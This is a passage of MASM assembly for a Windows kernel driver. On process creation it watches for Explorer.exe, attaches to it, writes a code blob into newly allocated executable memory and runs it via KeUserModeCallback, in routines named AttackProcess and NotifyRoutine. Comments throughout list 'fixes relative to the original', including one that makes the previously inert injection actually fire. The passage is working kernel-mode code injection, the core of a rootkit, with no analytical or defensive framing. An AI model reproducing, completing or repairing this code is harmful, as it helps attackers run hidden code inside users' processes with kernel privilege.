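    ; they keep the thread's previous mode, so the kernel-stack pointers passed
    ; here would fail the user-mode probe.  The Zw* entry points are used instead,
    ; the pages are allocated executable since they hold code, and MEM_RELEASE
    ; (RegionSize 0) frees the whole reservation rather than decommitting only.
    ; Caveats left in place:
    ;   * lpPeb is user memory read without ProbeForRead / __try; an inaccessible
    ;     PEB bug-checks.
    ;   * NOTE(review): the user-mode dispatcher calls *through* the table entry
    ;     it indexes, i.e. it loads a pointer from the start of the buffer and
    ;     calls that; check against the target ntdll whether a pointer, not raw
    ;     code, has to sit in the buffer's first dword.
    ;   * KeUserModeCallBack is the spelling this file links against; the
    ;     ntoskrnl export is KeUserModeCallback, so the declaration (not visible
    ;     here) must map it.
    local kernel_callback_table:DWORD
    local base_address:PVOID
    local allocation_size:DWORD
    local out_buffer:PVOID
    local out_length:DWORD
    local status:NTSTATUS

    mov eax, lpPeb
    mov eax, dword ptr [eax+2Ch]        ; PEB.KernelCallbackTable
    mov kernel_callback_table, eax

    ; Reserve + commit dwSize+1024 bytes in the current (attached) process; -1 is
    ; the current-process handle.
    and base_address, 0
    mov eax, dwSize
    add eax, 1024
    mov allocation_size, eax
    invoke ZwAllocateVirtualMemory, -1, addr base_address, 0, addr allocation_size, MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE
    mov status, eax
    .if eax == STATUS_SUCCESS
        ; Copy the code into the user buffer (direction flag cleared explicitly).
        mov esi, dwAddr
        mov edi, base_address
        mov ecx, dwSize
        cld
        rep movsb

        ; ApiNumber = (buffer - KernelCallbackTable) / sizeof(PVOID)
        mov edx, base_address
        sub edx, kernel_callback_table
        shr edx, 2
        and out_buffer, 0
        and out_length, 0
        ; KeUserModeCallBack(ApiNumber, InputBuffer, InputLength, &OutputBuffer, &OutputLength)
        lea eax, out_length
        push eax
        lea eax, out_buffer
        push eax
        push 0
        lea eax, out_buffer             ; no input; any valid pointer will do
        push eax
        push edx
        call KeUserModeCallBack
        mov status, eax

        ; Release the whole reservation; MEM_RELEASE requires RegionSize == 0.
        and allocation_size, 0
        invoke ZwFreeVirtualMemory, -1, addr base_address, addr allocation_size, MEM_RELEASE
    .endif
    mov eax, status
    ret
CallToUserMode endp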
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
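AttackProcess proc pEpr:PVOID
    ; Attach to the process behind pEpr (an EPROCESS reference the caller holds),
    ; push a copy of myproc into it and run it via CallToUserMode, then detach.
    ; Out: eax = STATUS_UNSUCCESSFUL when the attached process exposes no
    ;            user-mode PEB (kernel thread / system process), otherwise the
    ;            status CallToUserMode returned.  NotifyRoutine only clears its
    ;            one-shot guard on STATUS_SUCCESS, so a failed callback is retried
    ;            on the next matching process.
    ; Fixes relative to the original:
    ;   * KeAttachProcess returns VOID; testing eax for STATUS_SUCCESS afterwards
    ;     decided on leftover register contents.
    ;   * `jz Attack_End_err:` (trailing colon) and EnableWriteProcect (typo)
    ;     did not assemble, and the no-PEB exit skipped KeDetachProcess,
    ;     leaving the thread attached.  Every path now detaches.
    ;   * The CR0.WP toggling around the call is gone: CallToUserMode only
    ;     writes to freshly allocated user pages, which need no WP change, and
    ;     flipping a per-CPU register without disabling preemption is a hazard
    ;     in itself.
    local status:NTSTATUS
    mov status, STATUS_UNSUCCESSFUL
    invoke KeAttachProcess, pEpr
    invoke GetUserPEB
    .if eax != 0
        invoke CallToUserMode, eax, addr myproc, length_myproc
        mov status, eax
    .endif
    invoke KeDetachProcess
    mov eax, status
    ret
AttackProcess endp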
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NotifyRoutine
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
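NotifyRoutine proc uses esi dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN
    ; PsSetCreateProcessNotifyRoutine callback.  On process creation it resolves
    ; the parent process (falling back to the new process when the parent cannot
    ; be looked up), converts its image path to ANSI and, when the file-name
    ; component equals Target ("Explorer.exe", case-insensitively), injects once
    ; via AttackProcess.  notAttack is the one-shot guard: cleared after a
    ; successful injection, so the driver injects at most once per load.
    ; Fixes relative to the original:
    ;   * bCreate is honoured (it was loaded into eax and ignored), so process
    ;     exits no longer trigger a user-mode callback on an exiting thread.
    ;   * the __strcmpi result was tested inverted (non-zero means *different*).
    ;   * only the component after the last '\' is compared, so a full image
    ;     path can match the bare file name; the converted string is explicitly
    ;     NUL-terminated before it is scanned, and the conversion status is
    ;     checked instead of dropped.
    ;   * notAttacked (undeclared) is the notAttack global.
    ; Still worth knowing: szProcessName is one global buffer shared by concurrent
    ; callbacks, and the parent-first lookup presumably exists because the
    ; callback runs on the creating thread, whose process is the parent -- the
    ; one a user-mode callback can actually be made on.  us.Buffer is released
    ; with ExFreePool exactly as before; GetImageFilePath is not visible here.
    local peProcess:PVOID               ; referenced EPROCESS, released on every path below
    local us:UNICODE_STRING             ; image path from GetImageFilePath
    local as:ANSI_STRING                ; ANSI view over szProcessName

    ; bCreate is a BOOLEAN (one byte); only the low byte is meaningful.
    movzx eax, byte ptr bCreate
    .if eax == 0
        ret
    .endif

    ; The pushed dword is the output slot for PsLookupProcessByProcessId
    ; (esp points at it when invoke pushes the argument).
    push eax
    invoke PsLookupProcessByProcessId, dwParentId, esp
    pop peProcess
    .if eax != STATUS_SUCCESS
        push eax
        invoke PsLookupProcessByProcessId, dwProcessId, esp
        pop peProcess
        .if eax != STATUS_SUCCESS
            ret                         ; nothing referenced, nothing to release
        .endif
    .endif
    ; From here on peProcess carries a reference that must be dropped.

    invoke GetImageFilePath, peProcess, addr us
    .if eax == STATUS_SUCCESS
        lea eax, szProcessName
        mov as.Buffer, eax
        mov as.MaximumLength, IMAGE_FILE_PATH_LEN - 1   ; leave room for the terminator
        and as._Length, 0
        invoke RtlUnicodeStringToAnsiString, addr as, addr us, FALSE
        push eax                        ; keep the conversion status across the free
        invoke ExFreePool, us.Buffer
        pop eax
        .if eax == STATUS_SUCCESS
            ; Terminate, then locate the character after the last backslash.
            movzx ecx, as._Length
            mov byte ptr szProcessName[ecx], 0
            lea esi, szProcessName
            mov edx, esi                ; edx = start of the file-name component
            .while byte ptr [esi] != 0
                .if byte ptr [esi] == '\'
                    lea edx, [esi+1]
                .endif
                inc esi
            .endw
            invoke __strcmpi, edx, addr Target
            .if eax == 0
                .if notAttack
                    invoke AttackProcess, peProcess
                    .if eax == STATUS_SUCCESS
                        mov notAttack, FALSE
                    .endif
                .endif
            .endif
        .endif
    .endif
    fastcall ObfDereferenceObject, peProcess
    ret
NotifyRoutine endp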
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
    ; IRP_MJ_DEVICE_CONTROL handler.  No control code is implemented: every
    ; request is completed with STATUS_INVALID_DEVICE_REQUEST and zero bytes of
    ; output, and the same status is returned.  (The original also fetched the
    ; current stack location into edi and stored an intermediate
    ; STATUS_UNSUCCESSFUL; neither was ever read.)
    mov esi, pIrp
    assume esi:ptr _IRP
    mov [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST
    and [esi].IoStatus.Information, 0
    assume esi:nothing
    ; Once completed the IRP must not be dereferenced again, so the return
    ; status is taken from the constant rather than from the IRP.
    fastcall IofCompleteRequest, esi, IO_NO_INCREMENT
    mov eax, STATUS_INVALID_DEVICE_REQUEST
    ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverUnload proc pDriverObject:PDRIVER_OBJECT
    ; Tear down in reverse order of DriverEntry: remove the process-notify
    ; routine (TRUE = remove), drop the DosDevices link, delete the device.
    ; Removal is unconditional -- g_fbNotifyRoutineSet is not consulted -- which
    ; is the safer default: the callback must be gone before this image unloads,
    ; and a remove for a routine that was never registered only returns an error.
    invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE
    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
    mov ecx, pDriverObject
    assume ecx:ptr DRIVER_OBJECT
    invoke IoDeleteDevice, [ecx].DeviceObject
    assume ecx:nothing
    ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; D I S C A R D A B L E C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetImageFileNameOffset
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetImageFileNameOffset proc uses esi ebx
    ; Locate EPROCESS.ImageFileName without hard-coding a per-build offset:
    ; scan the first page (offsets 0..0FFFh) of the current process's EPROCESS
    ; for the 6 characters "system", case-insensitively -- DriverEntry runs in
    ; the System process, whose image name is exactly that.
    ; Offsets noted by the original author: W2K 01FCh, WXP 0174h, WNET 0154h.
    ; Out: eax = offset of the match, or 0 when nothing matched in the page.
    invoke IoGetCurrentProcess
    mov esi, eax                        ; esi = EPROCESS base
    xor ebx, ebx                        ; ebx = candidate offset
    .repeat
        lea eax, [esi+ebx]
        invoke _strnicmp, eax, $CTA0("system"), 6
        .break .if eax == 0             ; found at ebx
        inc ebx
    .until ebx == 1000h
    .if eax != 0
        xor ebx, ebx                    ; not found: report 0
    .endif
    mov eax, ebx
    ret
GetImageFileNameOffset endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
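DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    ; Create the control device and its DosDevices link, install the dispatch
    ; and unload routines, prime the globals, then register NotifyRoutine.
    ; Out: eax = STATUS_SUCCESS, or the failing call's status
    ;            (STATUS_DEVICE_CONFIGURATION_ERROR when IoCreateDevice /
    ;            IoCreateSymbolicLink fail, as before).
    ; Fixes relative to the original:
    ;   * notAttack was initialised to FALSE, which is the "already injected"
    ;     state NotifyRoutine checks for -- the driver could never fire.  It now
    ;     starts TRUE.
    ;   * the PsSetCreateProcessNotifyRoutine status was ignored and
    ;     g_fbNotifyRoutineSet never set; on failure the device and link are
    ;     torn down and the error returned so the driver does not stay loaded
    ;     half-initialised.
    ;   * globals the callback reads are written before the callback can run.
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT

    mov status, STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject
    .if eax == STATUS_SUCCESS
        invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
        .if eax == STATUS_SUCCESS
            mov eax, pDriverObject
            assume eax:ptr DRIVER_OBJECT
            mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
            mov [eax].DriverUnload, offset DriverUnload
            assume eax:nothing

            ; Nothing has been injected yet; the offset may legitimately be 0
            ; (scan found nothing) and is recorded as such.
            mov notAttack, TRUE
            and g_fbNotifyRoutineSet, FALSE
            invoke GetImageFileNameOffset
            mov g_dwImageFileNameOffset, eax

            invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE
            mov status, eax
            .if eax == STATUS_SUCCESS
                mov g_fbNotifyRoutineSet, TRUE
            .else
                invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
                invoke IoDeleteDevice, pDeviceObject
            .endif
        .else
            invoke IoDeleteDevice, pDeviceObject
        .endif
    .endif
    mov eax, status
    ret
DriverEntry endp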




